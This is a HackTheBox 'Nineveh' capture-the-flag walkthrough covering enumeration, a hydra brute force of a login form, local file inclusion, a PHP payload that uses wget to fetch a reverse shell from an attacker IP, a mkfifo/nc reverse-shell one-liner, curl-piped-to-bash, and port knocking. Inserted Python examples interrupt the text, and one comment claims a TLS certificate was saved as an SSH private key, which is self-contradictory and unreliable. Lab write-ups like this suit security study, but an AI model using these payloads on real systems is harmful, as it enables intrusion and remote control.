
Hackthebox - Nineveh

Enumeration

nmap -sV -sC -O -vv 10.10.10.43 -oA nineveh
PORT    STATE SERVICE  REASON         VERSION
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR/emailAddress=admin@nineveh.htb/organizationalUnitName=Support/localityName=Athens
| Issuer: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR/emailAddress=admin@nineveh.htb/organizationalUnitName=Support/localityName=Athens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-07-01T15:03:30
| Not valid after:  2018-07-01T15:03:30
| MD5:   d182 94b8 0210 7992 bf01 e802 b26f 8639
| SHA-1: 2275 b03e 27bd 1226 fdaa 8b0f 6de9 84f0 113b 42c0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete

Directory Enum

dirb http://10.10.10.43/

+ http://10.10.10.43/index.html (CODE:200|SIZE:178)
+ http://10.10.10.43/info.php (CODE:200|SIZE:83767)
+ http://10.10.10.43/server-status (CODE:403|SIZE:299)
dirb https://10.10.10.43/

==> DIRECTORY: https://10.10.10.43/db/
+ https://10.10.10.43/index.html (CODE:200|SIZE:49)
+ https://10.10.10.43/server-status (CODE:403|SIZE:300)
gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

	Gobuster v3.1.0
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
	===============================================================
	[+] Url:                     http://10.10.10.43/
	[+] Method:                  GET
	[+] Threads:                 10
	[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
	[+] Negative Status codes:   404
	[+] User Agent:              gobuster/3.1.0
	[+] Timeout:                 10s
	===============================================================
	2022/02/22 20:17:21 Starting gobuster in directory enumeration mode
	===============================================================
	/department

Dirbuster

Brute force -> /department

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password\!" # \ -> escaping the ! character
	-> login: admin | password: 1q2w3e4r5t
	-> http://10.10.10.43/department/login.php

	-> [80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t

login: admin | password: 1q2w3e4r5t

LFI

  • Create a New Database hack.php
  • Create a new table and insert a text field with a default value
  • We can rename the database to ninevehNotes.php
  • Visiting → notes=/var/tmp/ninevehNotes.php

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt../../../../../../../etc/passwd
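Both notes= values that work in this writeup (files/ninevehNotes.txt../../../../../../../etc/passwd here and /var/tmp/ninevehNotes.php from the steps above) contain the literal ninevehNotes, which is consistent with the include being guarded by a substring match on the file name rather than by a path check. This added Python example (not from the writeup; the web root /var/www/html/department is an assumption) contrasts that guard with a containment check that normalizes the path first.

```python
import posixpath

# Assumption (not stated in the writeup): where manage.php resolves relative paths.
WEB_ROOT = "/var/www/html/department"
NOTES_DIR = posixpath.join(WEB_ROOT, "files")


def substring_check(notes):
    """Weak guard: accept any value that merely contains the expected file name."""
    return "ninevehNotes" in notes


def resolve(notes):
    """Normalize the parameter the way include() would see it: absolute values are
    used as-is, relative ones are joined to WEB_ROOT, then '..' segments collapse."""
    candidate = notes if notes.startswith("/") else posixpath.join(WEB_ROOT, notes)
    return posixpath.normpath(candidate)


def containment_check(notes):
    """Hardened guard: the normalized path must stay inside NOTES_DIR and be a .txt,
    so neither traversal out of the notes folder nor an absolute .php path passes."""
    resolved = resolve(notes)
    inside = posixpath.commonpath([NOTES_DIR, resolved]) == NOTES_DIR
    return inside and resolved.endswith(".txt")


if __name__ == "__main__":
    # Constructed inputs: the two values used in the writeup plus a legitimate one.
    for value in ("files/ninevehNotes.txt",
                  "files/ninevehNotes.txt../../../../../../../etc/passwd",
                  "/var/tmp/ninevehNotes.php"):
        print(f"{value!r:60} substring={substring_check(value)} "
              f"contained={containment_check(value)} -> {resolve(value)}")
```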

Exploitation

Reverse Shell

locate php-reverse-shell

cp /usr/share/webshells/php/php-reverse-shell.php ./

mv php-reverse-shell.php shell.txt

# Modify php shell with correct IP

nc -lvnp 1234

python -m SimpleHTTPServer
  • Edit the table with the following
<?php system("wget http://10.10.14.38:8000/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>

# Fire the shell by visiting the url
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php

Interactive Shell

which python
which python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z

stty raw -echo
fg
[Press Enter]

export TERM=screen

Privilege Escalation

  • There is a report folder

ps aux

  • Found sshd running, but no SSH port was open in the nmap scan
ls /usr/sbin
	-> knock
	-> chroot
www-data@nineveh$ cd /tmp # upload executable reverse shell
nano update

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.50 9000 >/tmp/f

nc -lvnp 9000
www-data@nineveh:/tmp$ wget http://10.10.14.50:8000/update
chmod +x update

Port Knocking

# Run LinEnum.sh on the target, fetched from the web server on the attacking machine

curl 10.10.14.38:8000/LinEnum.sh | bash

locate knockd

-> /etc/knockd.conf
	/etc/default/knockd
	/etc/init.d/knockd

cat /etc/knockd.conf

	-> logfile = /var/log/knockd.log
		 interface = ens160

		[openSSH]
		 sequence = 571, 290, 911
		 seq_timeout = 5
		 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
		 tcpflags = syn

		[closeSSH]
		 sequence = 911,290,571
		 seq_timeout = 5
		 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
		 tcpflags = syn

  • Sequence 571, 290, 911
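How knockd reads the configuration above, as an added Python example that is not part of the writeup or of knockd itself: it parses the [openSSH] and [closeSSH] sections, shows that the close sequence is the open sequence reversed, and sends the three SYNs within seq_timeout the same way the nmap loop below does. The knock target in any test call is a placeholder address.

```python
import socket
import time

# Constructed copy of the knockd.conf excerpt shown above, kept inline so this runs offline.
KNOCKD_CONF = """
 logfile = /var/log/knockd.log
 interface = ens160
[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn
[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn
"""

def parse_knockd(text):
    """{section: {key: value}}; keys before any [section] header go under 'options'."""
    conf, section = {}, "options"
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        else:
            key, _, value = line.partition("=")
            conf.setdefault(section, {})[key.strip()] = value.strip()
    return conf

def sequence(conf, section):
    """'571, 290, 911' -> [571, 290, 911]; knockd accepts either separator style."""
    return [int(p) for p in conf[section]["sequence"].replace(",", " ").split()]

def knock(host, ports, seq_timeout, send=None):
    """One SYN per port, in order; a connect() with a short timeout suffices because
    knockd only watches the SYN flag and the ports are filtered, so the handshake
    never completes. Returns True if all knocks fit within seq_timeout seconds."""
    def default_send(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.3)
            try:
                s.connect((host, port))
            except OSError:
                pass  # timeout or reset is expected; the SYN has already left
    start = time.monotonic()
    for port in ports:
        (send or default_send)(port)
    return time.monotonic() - start <= seq_timeout
```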

for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done

------------------------------------------------------------
	PORT    STATE    SERVICE
	571/tcp filtered umeter

	Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
	Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 16:08 EST
	Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
	Nmap scan report for 10.10.10.43
	Host is up.

	PORT    STATE    SERVICE
	290/tcp filtered unknown

	Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
	Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 16:08 EST
	Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
	Nmap scan report for 10.10.10.43
	Host is up.

	PORT    STATE    SERVICE
	911/tcp filtered xact-backup
------------------------------------------------------------
# the nmap scan output included the server's TLS certificate (not a private key); saved here as id_rsa
nano id_rsa

git clone https://github.com/grongor/knock

python3 knock 10.10.10.43 571 290 911

Skills Learned

  • HTTP-based brute forcing
  • Chaining exploits
  • Local file inclusion
  • Port knocking

WRITTEN BY Hong Woo
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing